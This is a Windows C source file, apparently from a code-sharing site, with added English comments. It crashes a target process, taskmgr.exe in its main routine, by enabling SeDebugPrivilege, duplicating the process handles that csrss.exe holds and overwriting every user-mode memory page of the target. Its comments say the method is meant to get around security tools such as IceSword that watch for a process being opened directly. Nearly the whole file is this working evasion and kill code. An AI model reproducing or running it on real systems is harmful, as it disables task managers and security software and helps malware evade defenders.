内核级结束进程c代码（注意：下面的代码实际上完全运行在用户态——它启用 SeDebugPrivilege 后复制 csrss.exe 持有的进程句柄来改写目标内存，并没有任何内核代码）
- #include <windows.h>
- #include <ntsecapi.h>
- #include <aclapi.h>
- #include <tlhelp32.h>
- #pragma comment (lib,"ntdll.lib") // Copy From DDK
- #pragma comment (lib,"Kernel32.lib")
- #pragma comment (lib,"Advapi32.lib")
- #pragma comment(linker, "/ENTRY:main")
/* In the SDK ULONG_PTR is normally a typedef (basetsd.h), not a macro, so
   this #ifndef is expected to be always true and the macro then shadows the
   SDK type. That is harmless on 32-bit x86 (same width, which is what the
   rest of this file assumes) but would be wrong on x64. */
#ifndef ULONG_PTR
#define ULONG_PTR unsigned long
#endif
- //------------------ 数据类型声明开始 --------------------//
/* Output buffer for ZwQueryInformationProcess class 0 (ProcessBasicInformation).
   Only UniqueProcessId is consumed in this file (KillIce uses it to tell
   which process a duplicated csrss handle refers to). PebBaseAddress is
   declared ULONG rather than a pointer, which only matches the kernel's
   layout on 32-bit builds. */
typedef struct _PROCESS_BASIC_INFORMATION {
    NTSTATUS ExitStatus;
    ULONG PebBaseAddress;
    ULONG_PTR AffinityMask;
    LONG BasePriority;
    ULONG_PTR UniqueProcessId;
    ULONG_PTR InheritedFromUniqueProcessId;
} PROCESS_BASIC_INFORMATION;
typedef PROCESS_BASIC_INFORMATION *PPROCESS_BASIC_INFORMATION;
/* One entry of the SystemHandleInformation dump; in the buffer a ULONG entry
   count precedes the array. KillIce keeps entries whose ProcessId is csrss
   and whose ObjectTypeNumber is 5 (the Process type index on the kernels
   this was written for - type indices are assigned at boot and are not
   guaranteed stable across Windows versions, so verify before relying on it)
   and duplicates the Handle value. Handle is only 16 bits wide here, so
   handle values of 0x10000 and above cannot be represented by this layout. */
typedef struct _SYSTEM_HANDLE_INFORMATION
{
    ULONG ProcessId;
    UCHAR ObjectTypeNumber;
    UCHAR Flags;
    USHORT Handle;
    PVOID Object;
    ACCESS_MASK GrantedAccess;
} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;
/* Entry layout for SystemModuleInformation (class 11). Declared but never
   used in this file - nothing queries that class - presumably carried over
   from a loaded-module enumerator. */
typedef struct _SYSTEM_MODULE_INFORMATION {
    ULONG Reserved[2];
    PVOID Base;
    ULONG Size;
    ULONG Flags;
    USHORT Index;
    USHORT Unknown;
    USHORT LoadCount;
    USHORT ModuleNameOffset;
    CHAR ImageName[256];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
/* Object attributes handed to ZwOpenProcess. KillIce sets Length and zeroes
   every other field (no name, no root, no inherit/kernel-handle flags, no
   security descriptor, no SQOS): the open is identified purely by the
   CLIENT_ID argument. */
typedef struct _OBJECT_ATTRIBUTES {
    ULONG Length;
    HANDLE RootDirectory;
    PUNICODE_STRING ObjectName;
    ULONG Attributes;
    PVOID SecurityDescriptor;
    PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;
/* View-inheritance flag for section mapping calls. Not referenced in this
   file (no ZwMapViewOfSection is declared or called). */
typedef enum _SECTION_INHERIT {
    ViewShare = 1,
    ViewUnmap = 2
} SECTION_INHERIT;
/* Not referenced anywhere in this file. The field names (KPEB, CR3) suggest
   it was meant to receive per-process data from a kernel-side component,
   but nothing here produces or consumes it - presumably a leftover. */
typedef struct _MY_PROCESS_INFO {
    ULONG PID;
    ULONG KPEB;
    ULONG CR3;
    CHAR Name[16];
    ULONG Reserved;
} MY_PROCESS_INFO, *PMY_PROCESS_INFO;
/* Process/thread identity for ZwOpenProcess. UniqueProcess carries the PID
   cast to HANDLE (KillIce stores the csrss PID there); UniqueThread is left
   0 for a process open. */
typedef struct _CLIENT_ID {
    HANDLE UniqueProcess;
    HANDLE UniqueThread;
} CLIENT_ID;
typedef CLIENT_ID *PCLIENT_ID;
/* NTSTATUS is already used by PROCESS_BASIC_INFORMATION above this line, so
   this only compiles because one of the SDK headers included at the top
   (presumably ntsecapi.h) has already provided the same typedef; this is a
   redundant, identical redeclaration. */
typedef long NTSTATUS;
- //------------------ 数据类型声明结束 --------------------//
- //--------------------- 预定义开始 -----------------------//
/* Status codes and information classes hand-copied so the file does not
   depend on ntstatus.h / winternl.h. NT_SUCCESS treats every non-negative
   status - including informational and warning codes - as success.
   SystemHandleInformation (0x10) is the class KillIce queries;
   SystemModuleInformation (11) is defined but never queried here. */
#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
#define STATUS_SUCCESS 0x00000000
#define STATUS_UNSUCCESSFUL 0xC0000001
#define STATUS_NOT_IMPLEMENTED 0xC0000002
#define STATUS_INFO_LENGTH_MISMATCH 0xC0000004
#define STATUS_INVALID_PARAMETER 0xC000000D
#define STATUS_ACCESS_DENIED 0xC0000022
#define STATUS_BUFFER_TOO_SMALL 0xC0000023
#define OBJ_KERNEL_HANDLE 0x00000200
#define SystemModuleInformation 11
#define SystemHandleInformation 0x10
/* Fills an OBJECT_ATTRIBUTES: ObjectName n, Attributes a, RootDirectory r,
   SecurityDescriptor s; SecurityQualityOfService is always NULL. The body
   is a bare brace block rather than do { } while (0), so it must not be
   used as the unbraced body of an if/else. */
#define InitializeObjectAttributes( p, n, a, r, s ) { (p)->Length = sizeof( OBJECT_ATTRIBUTES );(p)->RootDirectory = r; (p)->Attributes = a; (p)->ObjectName = n; (p)->SecurityDescriptor = s; (p)->SecurityQualityOfService = NULL; }
- //--------------------- 预定义结束 -----------------------//
- //------------------ Native API声明开始 ------------------//
/* The nine ntdll exports this file uses. Each is resolved at run time in
   KillIce with GetProcAddress into the global function pointer declared
   below it, so nothing here links against ntdll.lib. The commented
   prototypes are the documented signatures; where the typedef deviates
   from the real export it is noted, because the call sites rely on the
   implicit conversions that the looser types allow. */

/*
NTSYSAPI NTSTATUS NTAPI ZwQuerySystemInformation(
    ULONG SystemInformationClass,
    PVOID SystemInformation,
    ULONG SystemInformationLength,
    PULONG ReturnLength );
*/
typedef NTSTATUS (NTAPI* PNtZwQuerySystemInformation) (ULONG, PVOID, ULONG, PULONG);
PNtZwQuerySystemInformation ZwQuerySystemInformation;

/*
NTSYSAPI NTSTATUS NTAPI ZwOpenProcess(
    OUT PHANDLE ProcessHandle,
    IN ACCESS_MASK AccessMask,
    IN POBJECT_ATTRIBUTES ObjectAttributes,
    IN PCLIENT_ID ClientId );
*/
typedef NTSTATUS (NTAPI* PNtZwOpenProcess) (OUT PHANDLE, IN ACCESS_MASK, IN POBJECT_ATTRIBUTES,
IN PCLIENT_ID);
PNtZwOpenProcess ZwOpenProcess;

/*
NTSYSAPI NTSTATUS NTAPI ZwAllocateVirtualMemory(
    IN HANDLE ProcessHandle,
    IN OUT PVOID *BaseAddress,
    IN ULONG ZeroBits,
    IN OUT PULONG RegionSize,
    IN ULONG AllocationType,
    IN ULONG Protect );
   BaseAddress is PVOID* in the export; the typedef declares plain PVOID,
   so passing &buf converts silently. */
typedef NTSTATUS (NTAPI* PNtZwAllocateVirtualMemory) (IN HANDLE, IN OUT PVOID,
IN ULONG, IN OUT PULONG,
IN ULONG, IN ULONG);
PNtZwAllocateVirtualMemory ZwAllocateVirtualMemory;

/*
NTSYSAPI NTSTATUS NTAPI ZwDuplicateObject(
    IN HANDLE SourceProcessHandle,
    IN HANDLE SourceHandle,
    IN HANDLE TargetProcessHandle,
    OUT PHANDLE TargetHandle,
    IN ACCESS_MASK DesiredAccess OPTIONAL,
    IN BOOLEAN InheritHandle,
    IN ULONG Options );
   NOTE: the export takes SourceHandle by value (HANDLE). The typedef below
   declares it as PHANDLE, so KillIce casts the raw 16-bit handle value to
   PHANDLE; the value is passed through, never dereferenced. */
typedef NTSTATUS (NTAPI* PNtZwDuplicateObject) ( IN HANDLE, IN PHANDLE, IN HANDLE, OUT PHANDLE,
IN ACCESS_MASK, IN BOOLEAN, IN ULONG);
PNtZwDuplicateObject ZwDuplicateObject;

/*
NTSYSAPI NTSTATUS NTAPI ZwQueryInformationProcess(
    IN HANDLE ProcessHandle,
    IN PROCESSINFOCLASS ProcessInformationClass,
    OUT PVOID ProcessInformation,
    IN ULONG ProcessInformationLength,
    OUT PULONG ReturnLength );
   The class parameter is an enum in the export; it is declared PVOID here
   and KillIce passes 0, i.e. ProcessBasicInformation. */
typedef NTSTATUS(NTAPI* PNtZwQueryInformationProcess)(IN HANDLE, IN PVOID, OUT PVOID, IN ULONG, OUT PULONG );
PNtZwQueryInformationProcess ZwQueryInformationProcess;

/*
NTSYSAPI NTSTATUS NTAPI ZwProtectVirtualMemory(
    IN HANDLE ProcessHandle,
    IN OUT PVOID *BaseAddress,
    IN OUT PULONG NumberOfBytesToProtect,
    IN ULONG NewAccessProtection,
    OUT PULONG OldAccessProtection );
   BaseAddress and the byte count are in/out (the kernel may adjust them to
   page boundaries); the typedef again declares BaseAddress as PVOID. */
typedef NTSTATUS (NTAPI* PNtZwProtectVirtualMemory) (IN HANDLE, IN OUT PVOID, IN OUT PULONG, IN ULONG , OUT PULONG);
PNtZwProtectVirtualMemory ZwProtectVirtualMemory;

/*
NTSYSAPI NTSTATUS NTAPI ZwWriteVirtualMemory(
    IN HANDLE ProcessHandle,
    IN PVOID BaseAddress,
    IN PVOID Buffer,
    IN ULONG NumberOfBytesToWrite,
    OUT PULONG NumberOfBytesWritten OPTIONAL );
*/
typedef NTSTATUS (NTAPI *PNtZwWriteVirtualMemory) ( IN HANDLE, IN PVOID, IN PVOID, IN ULONG, OUT PULONG );
PNtZwWriteVirtualMemory ZwWriteVirtualMemory;

/*
NTSYSAPI NTSTATUS NTAPI ZwClose(
    IN HANDLE ObjectHandle );
*/
typedef NTSTATUS (NTAPI *PNtZwClose) ( IN HANDLE );
PNtZwClose ZwClose;

/*
NTSYSAPI NTSTATUS NTAPI ZwFreeVirtualMemory(
    IN HANDLE ProcessHandle,
    IN PVOID *BaseAddress,
    IN OUT PULONG RegionSize,
    IN ULONG FreeType );
   BaseAddress is PVOID* in the export; declared PVOID here. */
typedef NTSTATUS (NTAPI *PNtZwFreeVirtualMemory)( IN HANDLE, IN PVOID, IN OUT PULONG, IN ULONG );
PNtZwFreeVirtualMemory ZwFreeVirtualMemory;
- //------------------ Native API声明结束 ------------------//
- //------------------ 程序正式开始 ------------------//
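/*
 * GetPidByName - return the PID of the first running process whose image
 * name equals szName (case-insensitive), or 0 if no process matches or the
 * Toolhelp snapshot cannot be taken.
 *
 * The match is on the bare executable name reported by the snapshot, not
 * on a path or image signature, so any process that merely calls itself
 * "csrss.exe" would satisfy it; and when several processes share a name
 * (csrss.exe has one instance per session) only the first one in snapshot
 * order is returned. Callers that need a specific instance must
 * disambiguate themselves.
 */
DWORD GetPidByName(const char *szName)
{
    DWORD dwRet = 0;
    PROCESSENTRY32 pe32 = {0};
    HANDLE hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);

    if (hProcessSnap == INVALID_HANDLE_VALUE)
        return 0;

    pe32.dwSize = sizeof(PROCESSENTRY32);

    /* Walk the snapshot until the first name match. A failing
       Process32First simply leaves dwRet at 0; the snapshot handle is
       closed on every path, including that one. */
    for (BOOL ok = Process32First(hProcessSnap, &pe32); ok; ok = Process32Next(hProcessSnap, &pe32)) {
        if (lstrcmpi(szName, pe32.szExeFile) == 0) {
            dwRet = pe32.th32ProcessID;
            break;
        }
    }

    CloseHandle(hProcessSnap);
    return dwRet;
}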
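/*
 * KillIce - crash the process whose PID is dwProcessId without ever opening
 * that process by PID.
 *
 * This is entirely user mode despite the page title. The caller must hold
 * SeDebugPrivilege (main() enables it) so that csrss.exe can be opened with
 * PROCESS_ALL_ACCESS. The system handle table is then scanned for process
 * handles owned by csrss, each is duplicated into this process with
 * DUPLICATE_SAME_ACCESS and identified by PID, so the only NtOpenProcess
 * call ever made names csrss, not the target - which is what sidesteps
 * tools that hook NtOpenProcess/NtTerminateProcess on the target ("Ice" =
 * IceSword). The technique therefore assumes csrss keeps a sufficiently
 * privileged handle to the target; if it does not, nothing happens.
 *
 * The target is not terminated. Every page of its user-mode address space
 * (0x1000 .. 0x7FFFF000) that can be made RWX is overwritten with the first
 * page of the handle dump, so the process faults on its next instruction.
 * The write pattern itself is arbitrary.
 *
 * Baked-in assumptions (32-bit, XP-era kernels):
 *   - ObjectTypeNumber 5 is the Process object type; type indices are not
 *     guaranteed stable across Windows versions, so verify before relying
 *     on this.
 *   - user address space ends at 0x80000000 (no /3GB, not x64).
 *   - GetPidByName("csrss.exe") returns the csrss instance that holds the
 *     target's handle; with several sessions there are several instances.
 *
 * Returns silently when any ntdll export cannot be resolved, csrss cannot
 * be found or opened, or the handle snapshot cannot be taken. All handles
 * and the snapshot buffer are released on every path.
 */
void KillIce(ULONG dwProcessId)
{
    const ULONG kDumpSize = 0x400000;    /* fixed-size SystemHandleInformation snapshot */
    const ULONG kPage     = 0x1000;
    const ULONG kUserTop  = 0x80000000;  /* end of the 32-bit user address space */
    const UCHAR kProcessTypeIndex = 5;   /* ObjectTypeNumber of Process objects on the kernels this targets */

    HMODULE hNTDLL = LoadLibrary("ntdll");            /* only pins a reference; released at cleanup */
    HMODULE hNtDll = ::GetModuleHandle("ntdll.dll");
    HANDLE  ph      = NULL;                            /* csrss.exe, PROCESS_ALL_ACCESS */
    PVOID   buf     = NULL;                            /* handle snapshot, also used as the write pattern */
    ULONG   bytesIO = 0;
    CLIENT_ID cid;
    OBJECT_ATTRIBUTES attr;
    HANDLE  csrss_id;
    ULONG   NumOfHandle;
    ULONG   i;
    PSYSTEM_HANDLE_INFORMATION h_info;

    if (hNtDll == NULL)
        goto cleanup;

    /* Resolve every export up front; a missing one aborts before anything is touched. */
    ZwQuerySystemInformation  = (PNtZwQuerySystemInformation) GetProcAddress(hNtDll, "ZwQuerySystemInformation");
    ZwOpenProcess             = (PNtZwOpenProcess)            GetProcAddress(hNtDll, "ZwOpenProcess");
    ZwAllocateVirtualMemory   = (PNtZwAllocateVirtualMemory)  GetProcAddress(hNtDll, "ZwAllocateVirtualMemory");
    ZwDuplicateObject         = (PNtZwDuplicateObject)        GetProcAddress(hNtDll, "ZwDuplicateObject");
    ZwQueryInformationProcess = (PNtZwQueryInformationProcess)GetProcAddress(hNtDll, "ZwQueryInformationProcess");
    ZwProtectVirtualMemory    = (PNtZwProtectVirtualMemory)   GetProcAddress(hNtDll, "ZwProtectVirtualMemory");
    ZwWriteVirtualMemory      = (PNtZwWriteVirtualMemory)     GetProcAddress(hNtDll, "ZwWriteVirtualMemory");
    ZwClose                   = (PNtZwClose)                  GetProcAddress(hNtDll, "ZwClose");
    ZwFreeVirtualMemory       = (PNtZwFreeVirtualMemory)      GetProcAddress(hNtDll, "ZwFreeVirtualMemory");
    if (ZwQuerySystemInformation == NULL || ZwOpenProcess == NULL ||
        ZwAllocateVirtualMemory == NULL || ZwDuplicateObject == NULL ||
        ZwQueryInformationProcess == NULL || ZwProtectVirtualMemory == NULL ||
        ZwWriteVirtualMemory == NULL || ZwClose == NULL || ZwFreeVirtualMemory == NULL)
        goto cleanup;

    csrss_id = (HANDLE)GetPidByName("csrss.exe");
    if (csrss_id == NULL)
        goto cleanup;

    InitializeObjectAttributes(&attr, NULL, 0, NULL, NULL);
    cid.UniqueProcess = csrss_id;
    cid.UniqueThread  = NULL;
    /* The only open done by PID, and it names csrss rather than the target.
       Fails with STATUS_ACCESS_DENIED without SeDebugPrivilege. */
    if (!NT_SUCCESS(ZwOpenProcess(&ph, PROCESS_ALL_ACCESS, &attr, &cid)))
        goto cleanup;

    bytesIO = kDumpSize;
    if (!NT_SUCCESS(ZwAllocateVirtualMemory(GetCurrentProcess(), &buf, 0, &bytesIO, MEM_COMMIT, PAGE_READWRITE)))
        goto cleanup;

    /* Single fixed-size query: returns STATUS_INFO_LENGTH_MISMATCH (and no
       data) once the system handle table outgrows kDumpSize. */
    if (!NT_SUCCESS(ZwQuerySystemInformation(SystemHandleInformation, buf, kDumpSize, &bytesIO)))
        goto cleanup;

    NumOfHandle = *(PULONG)buf;
    h_info = (PSYSTEM_HANDLE_INFORMATION)((PUCHAR)buf + sizeof(ULONG));
    /* Bound the walk by the buffer, not by the count alone. */
    if (NumOfHandle > (kDumpSize - sizeof(ULONG)) / sizeof(SYSTEM_HANDLE_INFORMATION))
        goto cleanup;

    for (i = 0; i < NumOfHandle; i++, h_info++) {
        HANDLE h_dup;
        PROCESS_BASIC_INFORMATION pbi;
        ULONG addr;

        if (h_info->ProcessId != (ULONG)(ULONG_PTR)csrss_id ||
            h_info->ObjectTypeNumber != kProcessTypeIndex)
            continue;

        /* DUPLICATE_SAME_ACCESS inherits whatever access csrss was granted.
           The PNtZwDuplicateObject typedef declares SourceHandle as PHANDLE
           while the export takes it by value, hence the cast of the raw
           16-bit handle value; it is never dereferenced. */
        if (!NT_SUCCESS(ZwDuplicateObject(ph, (PHANDLE)(ULONG_PTR)h_info->Handle, (HANDLE)-1,
                                          &h_dup, 0, 0, DUPLICATE_SAME_ACCESS)))
            continue;

        /* Class 0 = ProcessBasicInformation: identify the process behind the
           handle by PID. A failed query (e.g. insufficient access on the
           duplicated handle) just skips this entry. */
        if (!NT_SUCCESS(ZwQueryInformationProcess(h_dup, 0, &pbi, sizeof(pbi), &bytesIO)) ||
            pbi.UniqueProcessId != dwProcessId) {
            ZwClose(h_dup);
            continue;
        }

        MessageBox(0, "目标已确定!", "OK", MB_OK);
        /* Make each user-mode page RWX and overwrite it with the first page
           of the snapshot. Pages that are not mapped fail the protect call
           and are skipped; write failures are deliberately ignored. */
        for (addr = kPage; addr < kUserTop; addr += kPage) {
            PVOID p0 = (PVOID)addr;
            PVOID p1 = p0;            /* in/out copy: the call may adjust it */
            ULONG sz = kPage;
            ULONG oldp;
            if (NT_SUCCESS(ZwProtectVirtualMemory(h_dup, &p1, &sz, PAGE_EXECUTE_READWRITE, &oldp)))
                ZwWriteVirtualMemory(h_dup, p0, buf, kPage, &oldp);
        }
        MessageBox(0, "任务已完成!", "OK", 0);
        ZwClose(h_dup);
        break;  /* first matching handle only */
    }

cleanup:
    /* ph and buf are only non-NULL after every export resolved, so the
       pointers used here are valid whenever they are needed. */
    if (buf != NULL) {
        bytesIO = 0;  /* RegionSize 0 with MEM_RELEASE frees the whole region */
        ZwFreeVirtualMemory(GetCurrentProcess(), &buf, &bytesIO, MEM_RELEASE);
    }
    if (ph != NULL)
        ZwClose(ph);
    if (hNTDLL != NULL)
        FreeLibrary(hNTDLL);
}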
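/*
 * EnablePrivilege - enable (fEnable != 0) or disable the named privilege in
 * hToken, which must have been opened with TOKEN_ADJUST_PRIVILEGES.
 *
 * Returns TRUE only when the privilege name resolved and the token now
 * holds the privilege in the requested state. Returns FALSE when the name
 * is unknown, when AdjustTokenPrivileges fails outright, or when it
 * "succeeds" but reports ERROR_NOT_ALL_ASSIGNED - the case where the token
 * does not contain the privilege at all, which is the usual outcome for
 * SeDebugPrivilege in a non-administrator token.
 */
BOOL EnablePrivilege(HANDLE hToken, LPCTSTR szPrivName, BOOL fEnable)
{
    TOKEN_PRIVILEGES tp;

    tp.PrivilegeCount = 1;
    /* An unchecked lookup would hand AdjustTokenPrivileges an uninitialised LUID. */
    if (!LookupPrivilegeValue(NULL, szPrivName, &tp.Privileges[0].Luid))
        return FALSE;
    tp.Privileges[0].Attributes = fEnable ? SE_PRIVILEGE_ENABLED : 0;

    if (!AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(tp), NULL, NULL))
        return FALSE;
    /* A non-zero return only means the call was processed; the last-error
       value tells whether every requested privilege was actually adjusted. */
    return GetLastError() == ERROR_SUCCESS;
}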
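/*
 * Raw entry point: the linker option "/ENTRY:main" above bypasses the CRT,
 * so there are no argc/argv, no static constructors, and the process has to
 * end with ExitProcess. Enables SeDebugPrivilege on our own token (present
 * by default only in administrator tokens; without it the csrss open inside
 * KillIce is denied), then targets taskmgr.exe if it is running.
 */
void main()
{
    ULONG Pid;
    HANDLE hToken = NULL;

    if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken)) {
        /* Deliberately not fatal: if the privilege is unavailable KillIce
           simply fails at ZwOpenProcess and returns. */
        EnablePrivilege(hToken, SE_DEBUG_NAME, TRUE);
        CloseHandle(hToken);
    }

    Pid = GetPidByName("taskmgr.exe");
    if (Pid != 0)
        KillIce(Pid);

    ExitProcess(0);
}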
http://read.pudn.com/downloads122/sourcecode/windows/system/519804/KillProcess.cpp__.htm